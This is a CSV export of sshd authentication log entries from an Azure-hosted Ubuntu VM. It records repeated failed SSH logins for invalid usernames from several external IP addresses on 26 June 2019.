+772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:08,UbuntuDevEnv,2019-06-26 18:05:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:11,UbuntuDevEnv,2019-06-26 18:05:10,auth,UbuntuDevEnv,info,Failed password for invalid user abdul from 58.87.109.107 port 59791 ssh2,58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abdul,58.87.109.1,59791,,
+774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:11,UbuntuDevEnv,2019-06-26 18:05:10,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 59791:11: Bye Bye [preauth],58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,59791,,
+775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:11,UbuntuDevEnv,2019-06-26 18:05:10,auth,UbuntuDevEnv,info,Disconnected from invalid user abdul 58.87.109.107 port 59791 [preauth],58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abdul,58.87.109.1,59791,,
+776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:28,UbuntuDevEnv,2019-06-26 18:05:28,auth,UbuntuDevEnv,info,Invalid user ventas from 107.175.127.237 port 59810,58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ventas,107.175.127.2,59810,,
+777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:28,UbuntuDevEnv,2019-06-26 18:05:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:28,UbuntuDevEnv,2019-06-26 18:05:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:30,UbuntuDevEnv,2019-06-26 18:05:30,auth,UbuntuDevEnv,info,Failed password for invalid user ventas from 107.175.127.237 port 59810 ssh2,58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ventas,107.175.127.2,59810,,
+780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:30,UbuntuDevEnv,2019-06-26 18:05:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ventas 107.175.127.237 port 59810 [preauth],58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ventas,107.175.127.2,59810,,
+781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:30,UbuntuDevEnv,2019-06-26 18:05:30,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 59810:11: Bye Bye [preauth],58595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,59810,,
+782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:19,UbuntuDevEnv,2019-06-26 18:06:18,auth,UbuntuDevEnv,info,Invalid user nagios from 123.30.238.211 port 56484,58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,123.30.238.2,56484,,
+783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:19,UbuntuDevEnv,2019-06-26 18:06:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:19,UbuntuDevEnv,2019-06-26 18:06:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=123.30.238.211,58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,123.30.238.2,,0,
+785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:20,UbuntuDevEnv,2019-06-26 18:06:19,auth,UbuntuDevEnv,info,Invalid user 2 from 54.37.66.73 port 39204,58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,54.37.66.7,39204,,
+786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:20,UbuntuDevEnv,2019-06-26 18:06:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:20,UbuntuDevEnv,2019-06-26 18:06:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:20,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 123.30.238.211 port 56484 ssh2,58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,123.30.238.2,56484,,
+789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:21,auth,UbuntuDevEnv,info,"Received disconnect from 123.30.238.211 port 56484:11: Normal Shutdown, Thank you for playing [preauth]",58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,123.30.238.2,56484,,
+790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:21,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 123.30.238.211 port 56484 [preauth],58764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,123.30.238.2,56484,,
+791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:21,auth,UbuntuDevEnv,info,Failed password for invalid user 2 from 54.37.66.73 port 39204 ssh2,58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,54.37.66.7,39204,,
+792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:21,auth,UbuntuDevEnv,info,Disconnected from invalid user 2 54.37.66.73 port 39204 [preauth],58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,54.37.66.7,39204,,
+793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:21,UbuntuDevEnv,2019-06-26 18:06:21,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 39204:11: Bye Bye [preauth],58787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,39204,,
+794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:32,UbuntuDevEnv,2019-06-26 18:06:32,auth,UbuntuDevEnv,info,Invalid user maya from 58.87.109.107 port 11510,58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,58.87.109.1,11510,,
+795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:32,UbuntuDevEnv,2019-06-26 18:06:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:32,UbuntuDevEnv,2019-06-26 18:06:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:35,UbuntuDevEnv,2019-06-26 18:06:35,auth,UbuntuDevEnv,info,Failed password for invalid user maya from 58.87.109.107 port 11510 ssh2,58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,58.87.109.1,11510,,
+798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:36,UbuntuDevEnv,2019-06-26 18:06:36,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 11510:11: Bye Bye [preauth],58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,11510,,
+799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:36,UbuntuDevEnv,2019-06-26 18:06:36,auth,UbuntuDevEnv,info,Disconnected from invalid user maya 58.87.109.107 port 11510 [preauth],58818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,58.87.109.1,11510,,
+800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:38,UbuntuDevEnv,2019-06-26 18:06:37,auth,UbuntuDevEnv,info,Invalid user shan from 157.230.190.1 port 57358,58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shan,157.230.190.1,57358,,
+801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:38,UbuntuDevEnv,2019-06-26 18:06:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:38,UbuntuDevEnv,2019-06-26 18:06:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:40,UbuntuDevEnv,2019-06-26 18:06:39,auth,UbuntuDevEnv,info,Failed password for invalid user shan from 157.230.190.1 port 57358 ssh2,58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shan,157.230.190.1,57358,,
+804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:40,UbuntuDevEnv,2019-06-26 18:06:39,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 57358:11: Bye Bye [preauth],58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,57358,,
+805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:06:40,UbuntuDevEnv,2019-06-26 18:06:39,auth,UbuntuDevEnv,info,Disconnected from invalid user shan 157.230.190.1 port 57358 [preauth],58850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shan,157.230.190.1,57358,,
+806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:44,UbuntuDevEnv,2019-06-26 18:07:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:44,UbuntuDevEnv,2019-06-26 18:07:44,auth,UbuntuDevEnv,info,Invalid user teamspeak3 from 107.175.127.237 port 48766,59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,107.175.127.2,48766,,
+808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:44,UbuntuDevEnv,2019-06-26 18:07:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:45,UbuntuDevEnv,2019-06-26 18:07:44,auth,UbuntuDevEnv,info,Invalid user porteus from 54.37.66.73 port 47802,59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,54.37.66.7,47802,,
+810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:45,UbuntuDevEnv,2019-06-26 18:07:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:45,UbuntuDevEnv,2019-06-26 18:07:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:46,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak3 from 107.175.127.237 port 48766 ssh2,59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,107.175.127.2,48766,,
+813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:46,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak3 107.175.127.237 port 48766 [preauth],59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,107.175.127.2,48766,,
+814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:46,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 48766:11: Bye Bye [preauth],59076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,48766,,
+815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:47,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Failed password for invalid user porteus from 54.37.66.73 port 47802 ssh2,59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,54.37.66.7,47802,,
+816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:47,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 47802:11: Bye Bye [preauth],59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,47802,,
+817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:47,UbuntuDevEnv,2019-06-26 18:07:46,auth,UbuntuDevEnv,info,Disconnected from invalid user porteus 54.37.66.73 port 47802 [preauth],59089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,54.37.66.7,47802,,
+818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:49,UbuntuDevEnv,2019-06-26 18:07:49,auth,UbuntuDevEnv,info,Invalid user wp-user from 58.87.109.107 port 27030,59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,58.87.109.1,27030,,
+819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:49,UbuntuDevEnv,2019-06-26 18:07:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:49,UbuntuDevEnv,2019-06-26 18:07:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:51,UbuntuDevEnv,2019-06-26 18:07:51,auth,UbuntuDevEnv,info,Failed password for invalid user wp-user from 58.87.109.107 port 27030 ssh2,59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,58.87.109.1,27030,,
+822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:51,UbuntuDevEnv,2019-06-26 18:07:51,auth,UbuntuDevEnv,info,Disconnected from invalid user wp-user 58.87.109.107 port 27030 [preauth],59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,58.87.109.1,27030,,
+823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:51,UbuntuDevEnv,2019-06-26 18:07:51,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 27030:11: Bye Bye [preauth],59101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,27030,,
+824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:55,UbuntuDevEnv,2019-06-26 18:07:55,auth,UbuntuDevEnv,info,Invalid user ashok from 80.108.220.67 port 52060,59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ashok,80.108.220.6,52060,,
+825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:55,UbuntuDevEnv,2019-06-26 18:07:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:55,UbuntuDevEnv,2019-06-26 18:07:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:57,UbuntuDevEnv,2019-06-26 18:07:56,auth,UbuntuDevEnv,info,Failed password for invalid user ashok from 80.108.220.67 port 52060 ssh2,59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ashok,80.108.220.6,52060,,
+828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:57,UbuntuDevEnv,2019-06-26 18:07:56,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 52060:11: Bye Bye [preauth],59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,52060,,
+829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:07:57,UbuntuDevEnv,2019-06-26 18:07:56,auth,UbuntuDevEnv,info,Disconnected from invalid user ashok 80.108.220.67 port 52060 [preauth],59111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ashok,80.108.220.6,52060,,
+830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:17,UbuntuDevEnv,2019-06-26 18:08:17,auth,UbuntuDevEnv,info,Invalid user zope from 157.230.190.1 port 45692,59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zope,157.230.190.1,45692,,
+831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:17,UbuntuDevEnv,2019-06-26 18:08:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
